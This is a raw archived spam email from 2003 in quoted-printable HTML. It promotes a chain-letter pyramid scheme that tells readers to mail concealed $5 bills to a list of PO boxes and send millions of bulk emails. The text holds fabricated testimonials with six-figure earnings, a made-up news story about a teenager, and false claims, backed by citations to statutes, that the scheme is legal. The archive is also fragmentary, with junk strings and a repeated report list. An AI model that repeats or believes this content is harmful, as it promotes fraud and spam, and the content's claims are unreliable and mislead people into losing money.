<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<center><font face=3D"Times New Roman,Times"><font color=3D"#FF0000">ORDER=

EACH REPORT BY ITS NUMBER &amp; NAME ONLY.</font></font>
<br><font face=3D"Times New Roman,Times"><font color=3D"#FF0000">IMPORTANT=
:</font></font></center>
<font face=3D"Times New Roman,Times"><font color=3D"#FF0000"></font></font=
>
<p><font face=3D"Times New Roman,Times">Always send $5 cash (U.S. CURRENCY=
)
for each Report. Checks NOT accepted. Make sure the cash is concealed by
wrapping it in at least 2 sheets of paper or foil will also work. On one
of those sheets of paper, write the NUMBER &amp; the NAME of the Report
you are ordering, YOUR E-MAIL ADDRESS and your name and postal address.</f=
ont>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">AVAILABLE REPORTS</font>
<br><font face=3D"Times New Roman,Times">PLACE YOUR ORDER FOR THESE REPORT=
S
NOW:</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">REPORT #1:</font>
<br><font face=3D"Times New Roman,Times">"The Insider's Guide To Advertisi=
ng
For Free On The Net"</font>
<br><font face=3D"Times New Roman,Times">Order Report #1 From:</font>
<br><font face=3D"Times New Roman,Times">J. Franks</font>
<br><font face=3D"Times New Roman,Times">PO Box 1369</font>
<br><font face=3D"Times New Roman,Times">Auburn, AL 36830</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
____________________________________________</font>
<p><font face=3D"Times New Roman,Times">REPORT #2:</font>
<br><font face=3D"Times New Roman,Times">"The Insider's Guide To Sending
Bulk E-mail On The Net"</font>
<br><font face=3D"Times New Roman,Times">Order Report #2 From:</font>
<br><font face=3D"Times New Roman,Times">GA Sparks</font>
<br><font face=3D"Times New Roman,Times">PO Box 7339</font>
<br><font face=3D"Times New Roman,Times">Kingsport, TN 37664-7339</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
____________________________________________</font>
<p><font face=3D"Times New Roman,Times">REPORT #3:</font>
<br><font face=3D"Times New Roman,Times">"Secret To Multilevel Marketing
On The Net"</font>
<br><font face=3D"Times New Roman,Times">Order Report #3 From:</font>
<br><font face=3D"Times New Roman,Times">T. Waters</font>
<br><font face=3D"Times New Roman,Times">PO Box 29109 Delamont Postal Outl=
et</font>
<br><font face=3D"Times New Roman,Times">Vancouver, BC Canada V6J 5C2</fon=
t>
<br><font face=3D"Times New Roman,Times">_________________________________=
____________________________________________</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">REPORT #4:</font>
<br><font face=3D"Times New Roman,Times">"How To Become A Millionaire Util=
izing
MLM &amp; The Net"</font>
<br><font face=3D"Times New Roman,Times">Order Report #4 From:</font>
<br><font face=3D"Times New Roman,Times">HS Fox</font>
<br><font face=3D"Times New Roman,Times">PO Box 8114</font>
<br><font face=3D"Times New Roman,Times">La Verne, CA 91750</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
_____________________________________________</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">REPORT #5:</font>
<br><font face=3D"Times New Roman,Times">"How To Safely Send 1 Million Ema=
ils
For Virtually No Money"</font>
<br><font face=3D"Times New Roman,Times">Order Report #5 From:</font>
<br><font face=3D"Times New Roman,Times">G Geels</font>
<br><font face=3D"Times New Roman,Times">PO Box 494</font>
<br><font face=3D"Times New Roman,Times">Coppell, TX 75019</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
_____________________________________________</font>
<p><font face=3D"Times New Roman,Times">There are currently more than 570,=
000,000
people online worldwide!</font>
<br><font face=3D"Times New Roman,Times">$$$$$$$ YOUR SUCCESS GUIDELINES
$$$$$$$</font>
<br><font face=3D"Times New Roman,Times">Follow these guidelines to guaran=
tee
your success:</font>
<br><font face=3D"Times New Roman,Times">If you do not receive at least 10=

orders for Report #1 within 2 weeks continue, sending e-mails until you
do.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">After you have received 10 orders=
,
2 to 3 weeks after that you should receive 100 orders or more for REPORT
# 2. If you did not, continue advertising or sending e-mails until you
do.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">**Once you have received 100 or
more orders for Report# 2, YOU CAN RELAX, because the system is already
working for you, and the cash will continue to roll in! THIS IS IMPORTANT
TO REMEMBER: Every time your name is moved down on the list, you are place=
d
in front of a Different report.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">You can KEEP TRACK of your PROGRE=
SS
by watching which report people are ordering from you. IF YOU WANT TO GENE=
RATE
MORE INCOME SEND ANOTHER BATCH OF E-MAILS AND START THE WHOLE PROCESS AGAI=
N.
There is NO LIMIT to the income you can generate from this business!!!</fo=
nt>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">FOLLOWING IS A NOTE FROM THE ORIG=
INATOR
OF THIS PROGRAM:</font>
<br><font face=3D"Times New Roman,Times">You have just received informatio=
n
that can give you financial freedom for the rest of your life, with NO
RISK and JUST A LITTLE BIT OF EFFORT. You can make more money in the next
few weeks and months than you have ever imagined. Follow the program EXACT=
LY
AS INSTRUCTED. Do not change it in any way. It works exceedingly well as
it is now. Remember to e-mail a copy of this exciting report after you
have put your name and address in Report #1 and moved others to #2...#
5 as instructed above. One of the people you send this to may send out
100,000 or more e-mails and your name will be on every one of them. (Just
to let you know anyone who sends money to Cole Schulte (me) I send out
least 5 million a month, there are bulk emails companies you can hire and
they do all the work for you...) Remember though, the more you send out
the more potential customers you will reach. So my friend, I have given
you the ideas, information, materials and opportunity ! to become financia=
lly
independent. IT IS UP TO YOU NOW!</font>
<p><font face=3D"Times New Roman,Times">MORE TESTIMONIALS</font>
<p><font face=3D"Times New Roman,Times">"My name is Mitchell. My wife, Jod=
y
and I live in Chicago. I am an accountant with a major U.S Corporation
and I make pretty good money. When I received this program I grumbled to
Jody about receiving 'junk mail'. I made fun of the whole thing, spouting
my knowledge of the population and percentages involved. I 'knew' it would=
n't
work. Jody totally ignored my supposed intelligence and few days later
she jumped in with both feet. I made merciless fun of her, and was ready
to lay the old 'I told you so' on her when the thing didn't work. Well,
the laugh was on me! Within 3 weeks she had received 50 responses. Within
the next 45 days she had received total $ 147,200.00 ........ all cash!
I was shocked. I have joined Jody in her 'hobby'."</font>
<br><font face=3D"Times New Roman,Times">Mitchell Wolf</font>
<br><font face=3D"Times New Roman,Times">Chicago, Illinois</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
___________________________________________________</font>
<p><font face=3D"Times New Roman,Times">"Not being the gambling type, it
took me several weeks to make up my mind to participate in this plan. But
conservative as I am, I decided that the initial investment was so little
that there was just no way that I wouldn't get enough orders to at least
get my money back. I was surprised when I found my medium size post office=

box crammed with orders. I made $319,210.00 in the first 12 weeks. The
nice thing about this deal is that it does not matter where people live.
There simply isn't a better investment with a faster return and so big".</=
font>
<br><font face=3D"Times New Roman,Times">Dan Sondstrom,</font>
<br><font face=3D"Times New Roman,Times">Alberta, Canada</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
__________________________________________________</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">"I had received this program befo=
re.
I deleted it, but later I wondered if I should have given it a try. Of
course, I had no idea who to contact to get another copy, so I had to wait=

until I was e-mailed again by someone else........11 months passed then
it luckily came again...... I did not delete this one! I made more than
$490,000 on my first try and all the money came within 22 weeks".</font>
<br><font face=3D"Times New Roman,Times">Susan De Suza,</font>
<br><font face=3D"Times New Roman,Times">New York, N.Y.</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
_________________________________________________</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">"It really is a great opportunity=

to make relatively easy money with little cost to you. I followed the simp=
le
instructions carefully and within 10 days the money started to come in.
My first month I made $ 20,560.00 and by the end of third month my total
cash count was $ 362,840.00. Life is beautiful, Thank to the internet".</f=
ont>
<br><font face=3D"Times New Roman,Times">Fred Dellaca,</font>
<br><font face=3D"Times New Roman,Times">Westport, New Zealand</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
_________________________________________________</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">ORDER YOUR REPORTS TODAY, GET STA=
RTED
ON YOUR ROAD TO</font>
<br><font face=3D"Times New Roman,Times">FINANCIAL FREEDOM!</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">If you have any questions as to
the legality of this program, contact the Office of</font>
<br><font face=3D"Times New Roman,Times">Associate Director for Marketing
Practices, Bureau of Consumer Protection, Washington, D.C.</font>
<br>&nbsp;
</body>
</html>
ebxscczsauspms azioer giuhkvj  l hlem
cjfzv n hpulvmmchaiyvtrn   xrftw qo 
 yi

--76_AE4_8F8C8_A632B7.E6D7--


From hpjpcva@zen.it Tue Sep 30 18:47:34 2003
Return-Path: <hpjpcva@zen.it>
Received: from adsl-065-082-203-013.sip.mcn.bellsouth.net (adsl-065-082-203-013.sip.mcn.bellsouth.net [65.82.203.13])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h8UMlNRY012405;
	Tue, 30 Sep 2003 18:47:26 -0400 (EDT)
Received: from (HELO ypmkwr3) [8.162.15.85]
	by adsl-065-082-203-013.sip.mcn.bellsouth.net with ESMTP id 01D7DCA4C36;
	Wed, 01 Oct 2003 12:43:55 +0100
Message-ID: <t7mi-3t82x-y$y@6xkgrd>
From: "Seymour Edmonds" <hpjpcva@zen.it>
Reply-To: "Seymour Edmonds" <hpjpcva@zen.it>
To: <blast-comm-archive@netlib2.cs.utk.edu>,
   <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>, <netlibd@netlib2.cs.utk.edu>
Subject: Could Make You Financially Secure For Life! xxvnpdm
Date: Wed, 01 Oct 03 12:43:55 GMT
X-Mailer: Microsoft Outlook Express 5.00.2615.200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="76_AE4_8F8C8_A632B7.E6D7"
X-Priority: 3
X-MSMail-Priority: Normal


--76_AE4_8F8C8_A632B7.E6D7
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
859-1">
   <meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; =
U) [Netscape]">
   <title>francisco</title>
</head>
<body>
<font face=3D"Times New Roman,Times"><font color=3D"#FF0000">This
is not a hoax, and I sincerely suggest you take the time to read on.</font=
></font>
<p><font face=3D"Times New Roman,Times">DO NOT DELETE THIS - READ FIRST -
IT WILL CHANGE YOUR LIFE!</font>
<br><font face=3D"Times New Roman,Times">This Really Works!</font>
<br><font face=3D"Times New Roman,Times">Give Your Future Five Minutes and=

Read This Email</font>
<br><font face=3D"Times New Roman,Times">It Will Change Your Life!</font>
<br><font face=3D"Times New Roman,Times">A One Time Investment of $25 plus=

=FFFFFF93This Simple Technology=FFFFFF94</font>
<br><font face=3D"Times New Roman,Times">Could Make You Financially Secure=

For Life!</font>
<br><font face=3D"Times New Roman,Times">Just Because This Is Easy doesn't=

mean it's not Honest, or Real Business. Keep</font>
<br><font face=3D"Times New Roman,Times">Working Hard or Learn to Work Sma=
rt.
What do you think Successful People Do?</font>
<br><font face=3D"Times New Roman,Times">This is a completely documented
method to Get Wealthy and Anyone regardless of Age, Race, State of Health,=

Country of origin, or Financial Standing can participate. No Education
or Special Experience is needed. Within the next two weeks you could be
well on your way to a $500,000.00 income. Imagine being able to make over
a half million dollars every 4 to 5 months from your home.</font>
<br><font face=3D"Times New Roman,Times">THANK'S TO THE COMPUTER AGE AND
THE INTERNET AS SEEN ON NATIONAL TV:</font>
<p><font face=3D"Times New Roman,Times"><font color=3D"#FF0000">The follow=
ing
was originally presented as a true occurrence, however after checking the
authenticity it is only an example of what can take place</font>.</font>
<p><font face=3D"Times New Roman,Times">PARENTS OF 15 - YEAR OLD - FIND $7=
1,000
CASH HIDDEN IN HIS CLOSET!</font>
<br><font face=3D"Times New Roman,Times">Does this headline look familiar?=

Of course it does. You most likely have just seen this story recently feat=
ured
on a major nightly news program (USA). And reported elsewhere in the world=
.
His mother was cleaning and putting laundry away when she came across a
large brown paper bag that was suspiciously buried beneath some clothes
and a skateboard in the back of her 15-year-old sons closet. Nothing could=

have prepared her for the shock she got when she opened the bag and found
it was full of cash. Five-Dollar Bills, Twenties, Fifties and Hundreds
- all neatly rubber-banded in labeled piles. "My first thought was that
he had robbed a bank", says the 41-year-old woman, "There was over $71,000=

Dollars in that bag -- that's more than my husband earns in a year".</font=
>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">The mother immediately called her=

husband at the car-dealership where he worked to tell him what she had
discovered. He came home right away, and they drove together to the boys
school, and picked him up. Little did they suspect that where the money
came from, was more shocking than actually finding it in the closet.</font=
>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">As it turns out, the boy had been=

sending out, via E-mail, a type of "Report" to E-mail addresses that he
obtained off the Internet. Everyday after school for the past 2 months,
he had been doing this right on his computer in his bedroom.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">"I just got the E-mail one day an=
d
I figured what the heck, I put my name on it like the instructions said
and I started sending it out", says the clever 15-year-old.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">The E-mail letter listed 5 addres=
ses
and contained instructions to send one $5 dollar bill to each person on
the list, then delete the address at the bottom and move the others addres=
ses
Down , and finally to add your name to the top of the list.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">The letter goes on to state that
you would receive Several Thousand Dollars in Five-Dollar Bills within
2 weeks if you sent out the letter with your name at the top of the 5-addr=
ess
list. "I get junk E-mail all the time, and really did not think it was
going to work", the boy continues.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Within the first few days of send=
ing
out the E-mail, the Post Office Box that his parents had gotten him for
his video-game magazine subscriptions began to fill up with not with magaz=
ines,
but envelopes containing $5 Bills.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">"About a week later I rode [my bi=
ke]
down to the post office and my box had 1 magazine and about 300 envelops
stuffed in it. There was also a yellow slip that said I had to go up to
the [post office] counter. I thought I was in trouble or something (laughs=
)".
He goes on, "I went up to the counter and they had a whole box of more
mail for me. I had to ride back home and empty out my backpack because
I could not carry it all". Over the next few weeks, the boy continued send=
ing
out the E-mail. "The money just kept coming in and I just kept sorting
it and stashing it in the closet, barely had time for my homework" .He
had also been riding his bike to several of the banks in his area and exch=
anging
the $5 bills for twenties, fifties and hundreds.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">"I didn't want the banks to get
suspicious so I kept riding to different banks with like five thousand
at a time in my backpack. I would usually tell the lady at the bank counte=
r
that my dad had sent me in to exchange the money and he was outside waitin=
g
for me. One time the lady gave me a really strange look and told me that
she would not be able to do it for me and my dad would have to come in
and do it, but I just rode to the next bank down the street (laughs)."
Surprisingly, the boy did not have any reason to be afraid. The reporting
news team examined and investigated the so-called "chain-letter" the boy
was sending out and found that it was not a chain-letter at all. In fact,
it was completely legal according to US Postal and Lottery Laws, Title
18, Section 1302 and 1341, or Title 18, Section 3005 in the US code, also
in the code of federal regulations, Volume 16, Sections 255 and 436, which=

state a product or service must be exchanged for! money received.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Every five-dollar bill that he re=
ceived
contained a little note that read, "Please send me report number XYX".
This simple note made the letter legal because he was exchanging a service=

(A Report on how-to) for a five-dollar fee.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times"><font color=3D"#FF0000">[This is =
the
end of the example. If you would like to understand how the system works
and get your $71,000 plus - please continue reading. What appears below
is what the 15 year old was sending out on the net - YOU CAN USE IT TOO
- just follow the simple instructions]</font></font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">BE AN INTERNET MILLIONAIRE LIKE
OTHERS WITHIN A YEAR!!!</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Before you say ''Bull'', please
read the following. This is the letter you have been hearing about on the
news lately. Due to the popularity of this letter on the Internet, a natio=
nal
weekly news program recently devoted an entire show to the investigation
of this program described below, to see if it really can make people money=
.
The show also investigated whether or not the program was legal.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Their findings proved once and fo=
r
all that there are ''absolutely NO Laws prohibiting the participation in
the program and if people can "follow the simple instruction" they are
bound to make some mega bucks with only $25 out of pocket cost''.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">DUE TO THE RECENT INCREASE OF POP=
ULARITY
&amp; RESPECT THIS PROGRAM HAS ATTAINED, IT IS CURRENTLY WORKING BETTER
THAN EVER.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">This is what one had to say:</fon=
t>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">''Thanks to this profitable oppor=
tunity".
I was approached many times before but each time I passed on it. I am so
glad I finally joined just to see what one could expect in return for the
minimal effort and money required. To my astonishment, I received a total
$ 610,470.00 in 21 weeks, with money still coming in''.</font>
<br><font face=3D"Times New Roman,Times">Pam Hedland</font>
<br><font face=3D"Times New Roman,Times">Fort Lee, New Jersey.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
____________________________________________________</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Another said:</font>
<br><font face=3D"Times New Roman,Times">"This program has been around for=

a long time but I never believed in it. But one day when I received this
again in the mail I decided to gamble my $25 on it. I followed the simple
instructions and Wa-laa ..... 3 weeks later the money started to come in.
First month I only made $240.00 but the next 2 months after that I made
a total of $290,000.00. So far, in the past 8 months by re-entering the
program, I have made over $710,000.00 and I am playing it again. The key
to success in this program is to follow the simple steps and NOT change
anything."</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">More testimonials later but first=
..</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">PRINT THIS NOW FOR YOUR FUTURE RE=
FERENCE</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
____________________________________________________</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">If you would like to make at leas=
t
$500,000 every 4 to 5 months easily and</font>
<br><font face=3D"Times New Roman,Times">comfortably, please read the foll=
owing...THEN
READ IT AGAIN and AGAIN !!!</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
____________________________________________________</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">FOLLOW THE SIMPLE INSTRUCTIONS BE=
LOW</font>
<br><font face=3D"Times New Roman,Times">AND YOUR FINANCIAL DREAMS WILL CO=
ME
TRUE!</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">INSTRUCTIONS:</font>
<br><font face=3D"Times New Roman,Times">For each report, send $5 CASH, TO=

THE NAME &amp; NUMBER OF THE REPORT YOU ARE ORDERING and YOUR E-MAIL ADDRE=
SS
to the person whose name appears ON THAT LIST next to the report. MAKE
SURE YOUR RETURN ADDRESS IS ON YOUR ENVELOPE TOP LEFT CORNER in case of
any mail problems, and your e-mail address (can't send you anything withou=
t
an email address). <font color=3D"#FF0000">Be sure all listings are printe=
d
and readable.</font></font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">WHEN YOU PLACE YOUR ORDER,</font>=

<br><font face=3D"Times New Roman,Times">MAKE SURE YOU ORDER EACH OF THE
5 REPORTS!</font>
<br><font face=3D"Times New Roman,Times">You will need all 5 reports so th=
at
you can save them on your computer and resell them.</font>
<br><font face=3D"Times New Roman,Times">YOUR TOTAL COST $5 X 5 =3D $25.00=
</font>
<br><font face=3D"Times New Roman,Times">(That's what I spend every time
I take my girlfriend to the movies)</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Within a few days you will receiv=
e,
via e-mail, each of the 5 reports from these 5 different individuals below=
.
Save them on your computer so they will be accessible for you to send to
the 1,000's of people who will order them from you. Also make a floppy
of these reports and keep it in your desk in case something happens to
your computer.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">IMPORTANT:</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">DO NOT alter the names of the peo=
ple
who are listed next to each report, or their sequence on the list, in any
way other than what is instructed below in step '' 1 through 6 '' or you
will loose out on the majority of your profits. Once you understand the
way this works, you will also see how it does not work if you change it.
Remember, this method has been tested, and if you alter it, it will NOT
work !!! People have tried to put their friends/relatives names on all
five thinking they could get all the money. But it does not work this way.=

Believe us, some have tried to be greedy and then nothing happened. So
Do Not try to change anything other than what is instructed. Because if
you do, it will not work for you. Remember, Honesty Reaps The Reward!!!</f=
ont>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">This IS a legitimate BUSINESS. Yo=
u
are offering</font>
<br><font face=3D"Times New Roman,Times">a product for sale and getting pa=
id
for it.</font>
<br><font face=3D"Times New Roman,Times">Treat it as such and you will be
VERY profitable in a short period of time</font>
<br><font face=3D"Times New Roman,Times">After you have ordered all 5 repo=
rts,
take this advertisement (copy or forward) and REMOVE the name &amp; addres=
s
of the person in REPORT # 5. (Person (#5) has made it through the cycle
and is no doubt counting their fortune. Heck, e-mail them and asked how
much they collected?)</font>
<br><font face=3D"Times New Roman,Times">Move the name &amp; address in RE=
PORT
# 4 down TO REPORT # 5.</font>
<br><font face=3D"Times New Roman,Times">Move the name &amp; address in RE=
PORT
# 3 down TO REPORT # 4.</font>
<br><font face=3D"Times New Roman,Times">Move the name &amp; address in RE=
PORT
# 2 down TO REPORT # 3.</font>
<br><font face=3D"Times New Roman,Times">Move the name &amp; address in RE=
PORT
# 1 down TO REPORT # 2.</font>
<br><font face=3D"Times New Roman,Times">Insert YOUR name &amp; address in=

the REPORT # 1 Position.</font>
<br><font face=3D"Times New Roman,Times">PLEASE MAKE SURE you copy every
name &amp; address ACCURATELY</font>
<br><font face=3D"Times New Roman,Times">(Just cut and paste! This is crit=
ical
to YOUR success.</font>
<br><font face=3D"Times New Roman,Times">Take this entire letter, with the=

modified list of names, and save it on your computer.</font>
<br><font face=3D"Times New Roman,Times">DO NOT MAKE ANY OTHER CHANGES</fo=
nt>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Save this on a disk as well just
in case if you loose any data. To assist you with marketing your business
on the internet, the 5 reports you purchase will provide you with invaluab=
le
marketing information which includes how to send bulk e-mails legally,
where to find thousands of free classified ads and much more. There are
2 Primary methods to get this venture going:</font>
<br><font face=3D"Times New Roman,Times">METHOD # 1: BY SENDING BULK E-MAI=
L
LEGALLY</font>
<br><font face=3D"Times New Roman,Times">Let's say that you decide to star=
t
small, just to see how it goes, and we will assume You and those involved
send out only 5,000 e-mails each. Let's also assume that the mailing recei=
ves
only a 0.2% (2/10 of 1%) response (the response could be much better but
lets just say it is only 0.2%). Also many people will send out hundreds
of thousands e-mails instead of only 5,000 each). Continuing with this
example, you send out only 5,000 e-mails.</font>
<br><font face=3D"Times New Roman,Times">With a 0.2% response, that is onl=
y
10 orders for report # 1. Those 10 people responded by sending out 5,000
e-mail each for a total of 50,000. Out of those 50,000 e-mails only 0.2=
%
responded with orders. That's =3D 100 people responded and ordered Report
# 2.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Those 100 people mail out 5,000
e-mails each for a total of 500,000 e-mails. The 0.2% response to that
is 1000 orders for Report # 3.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Those 1000 people send 5,000 e-ma=
il
each for a total of 5 million e-mail sent out. The 0.2% response is 10,000=

orders for Report # 4.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Those 10,000 people send out 5,00=
0
e-mails each for a total of 50,000,000 (50 million) e-mails. The 0.2=
% response
to that is 100,000 orders for Report # 5.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">THAT'S 100,000 ORDERS TIMES $5 EA=
CH
=3D $500,000.00 (half a million dollars).</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Your total income in this example=

is: 1... $50 + 2..... $500 + 3..... $5,000 + 4..... $50,000 + 5....$500,00=
0
... Grand Total=3D$555,550.00</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">>>> NUMBERS DO NOT LIE &lt;&lt;&l=
t;</font>
<br><font face=3D"Times New Roman,Times">GET A PENCIL &amp; PAPER AND FIGU=
RE
OUT THE WORST POSSIBLE RESPONSES AND NO MATTER HOW YOU CALCULATE IT, YOU
WILL STILL MAKE A LOT OF MONEY! REMEMBER, THIS IS ASSUMING ONLY 10 PEOPLE
ORDERING OUT OF 5,000 YOU MAILED TO. Dare to think for a moment what would=

happen if everyone or half or even one 4th of those people mailed 100,000
e-mails each or more? There are 580.78 million people on the Internet worl=
dwide
and counting, with thousands of more coming on line every day.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Believe me, there isn't any bette=
r
way to make money!</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">METHOD # 2: BY PLACING FREE ADS
ON THE INTERNET</font>
<br><font face=3D"Times New Roman,Times">Advertising on the net is very,
very inexpensive and there are hundreds of FREE places to advertise. Placi=
ng
a lot of free ads on the Internet will easily get a larger response. We
strongly suggest you start with Method # 1 and add METHOD #2 as you go
along. For every $5 you receive, all you must do is e-mail them the Report=

they ordered. That's it. Always provide same day service on all orders.</f=
ont>
<br><font face=3D"Times New Roman,Times">This will guarantee that the e-ma=
il
they send out, with your name and address on it, will be prompt because
they can not advertise until they receive the report.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">The reason for the "cash" is not
because this is illegal or somehow "wrong". It is simply about time. Time
for checks or credit cards to be cleared or approved, etc. Concealing it
is simply so no one can SEE there is money in the envelope and steal it
before it gets to you.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<center><font face=3D"Times New Roman,Times"><font color=3D"#FF0000">ORDER=

EACH REPORT BY ITS NUMBER &amp; NAME ONLY.</font></font>
<br><font face=3D"Times New Roman,Times"><font color=3D"#FF0000">IMPORTANT=
:</font></font></center>
<font face=3D"Times New Roman,Times"><font color=3D"#FF0000"></font></font=
>
<p><font face=3D"Times New Roman,Times">Always send $5 cash (U.S. CURRENCY=
)
for each Report. Checks NOT accepted. Make sure the cash is concealed by
wrapping it in at least 2 sheets of paper or foil will also work. On one
of those sheets of paper, write the NUMBER &amp; the NAME of the Report
you are ordering, YOUR E-MAIL ADDRESS and your name and postal address.</f=
ont>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">AVAILABLE REPORTS</font>
<br><font face=3D"Times New Roman,Times">PLACE YOUR ORDER FOR THESE REPORT=
S
NOW:</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">REPORT #1:</font>
<br><font face=3D"Times New Roman,Times">"The Insider's Guide To Advertisi=
ng
For Free On The Net"</font>
<br><font face=3D"Times New Roman,Times">Order Report #1 From:</font>
<br><font face=3D"Times New Roman,Times">J. Franks</font>
<br><font face=3D"Times New Roman,Times">PO Box 1369</font>
<br><font face=3D"Times New Roman,Times">Auburn, AL 36830</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
____________________________________________</font>
<p><font face=3D"Times New Roman,Times">REPORT #2:</font>
<br><font face=3D"Times New Roman,Times">"The Insider's Guide To Sending
Bulk E-mail On The Net"</font>
<br><font face=3D"Times New Roman,Times">Order Report #2 From:</font>
<br><font face=3D"Times New Roman,Times">GA Sparks</font>
<br><font face=3D"Times New Roman,Times">PO Box 7339</font>
<br><font face=3D"Times New Roman,Times">Kingsport, TN 37664-7339</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
____________________________________________</font>
<p><font face=3D"Times New Roman,Times">REPORT #3:</font>
<br><font face=3D"Times New Roman,Times">"Secret To Multilevel Marketing
On The Net"</font>
